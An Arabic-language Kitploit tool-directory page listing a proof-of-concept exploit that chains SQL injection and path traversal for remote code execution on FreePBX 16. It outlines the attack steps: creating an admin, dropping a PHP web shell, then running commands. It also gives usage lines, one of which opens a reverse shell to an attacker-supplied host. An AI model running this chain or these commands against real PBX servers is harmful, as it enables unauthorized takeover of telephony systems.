Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
FreePBX-CVE-2025-57819-RCE — إثبات مفهوم لاستغلال يربط بين حقن SQL غير مصادق عليه مع اجتياز مسار مصادق عليه لتحقيق تنفيذ تعليمات برمجية عن بُعد على FreePBX 16. يدعم الأوامر الفردية وصدفات عكسية تفاعلية. | Kitploit
أدوات/GitHubGitHub/0xehab/freepbx-cve-2025-57819-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHub0xehab/freepbx-cve-2025-57819-rce

FreePBX-CVE-2025-57819-RCE

إثبات مفهوم لاستغلال يربط بين حقن SQL غير مصادق عليه مع اجتياز مسار مصادق عليه لتحقيق تنفيذ تعليمات برمجية عن بُعد على FreePBX 16. يدعم الأوامر الفردية وصدفات عكسية تفاعلية.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
13منذ 2 أشهرلم تتم المراجعة بعد

FreePBX 16 — حقن SQL غير مصادق عليه إلى تنفيذ أوامر عن بُعد

إثبات مفهوم لاستغلال يربط بين ثغريتين في FreePBX للوصول من دخول صفري إلى تنفيذ أوامر عن بُعد على FreePBX 16.

CVEالمكونالتأثير
CVE-2025-57819مُحمّل وحدة النقاط الطرفية (مُعامِل brand)حقن SQL مُكدّس غير مصادق عليه
CVE-2025-61678رافع البرامج الثابتة لمدير النقاط الطرفية (مُعامِل fwbrand)رفع ملف تعسفي مصادق عليه (تجاوز المسار)

كيف يعمل

  1. إنشاء مسؤول (CVE-2025-57819) — يُستغل حقن SQL المُكدّس الذي يمكن الوصول إليه دون مصادقة عبر مُحمّل الوحدة المعرّف بالمساحة (namespace) لإدراج مسؤول جديد كامل الصلاحيات مباشرة في جدول ampusers.
  2. المصادقة — يسجّل دليل الإثبات (PoC) الدخول إلى لوحة الإدارة كمستخدم تم إنشاؤه حديثًا.
  3. إسقاط شِلّة ويب (CVE-2025-61678) — يُساء استخدام معالج رفع البرامج الثابتة لمدير النقاط الطرفية من خلال تجاوز المسار ../../../var/www/html/<dir> في fwbrand لكتابة شِلّة PHP في جذر الويب.
  4. التنفيذ — تنفيذ أمر واحد أو استقبال شِلّة تفاعلية عكسية.

الإصدارات المتأثرة

FreePBX 16 (وحدة النقاط الطرفية قبل الإصدار 16.0.92). تم التصحيح أيضًا في 17.0.6. قم بالتحديث إلى إصدار تم إصلاحه.

الاستخدام

root@kitploit:~
# single command
python3 exploit.py --rhost pbx.example.com --command "id"

# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

الخيارات

المتطلبات

root@kitploit:~
pip install requests pwntools

إخلاء مسؤولية

للاستخدام في الاختبارات الأمنية المصرح بها والأغراض التعليمية فقط. استخدمه حصريًا على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.

الكلمات المفتاحية

FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · حقن SQL غير مصادق عليه · حقن استعلامات مُكدّسة · وحدة النقاط الطرفية · مدير النقاط الطرفية · رفع ملفات مصادق عليه · تجاوز المسار · تنفيذ أوامر عن بُعد · RCE · PoC · استغلال · أمن VoIP


linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb

تنزيل الأداة
العَلَمةالوصف
--rhostالخادم الهدف (مطلوب)
--rportمنفذ الهدف (افتراضي 443)
--httpاستخدام HTTP بدلاً من HTTPS
--lhost / --lportعنوان ردّ شِلّة عكسية
--commandتشغيل أمر واحد بدلاً من شِلّة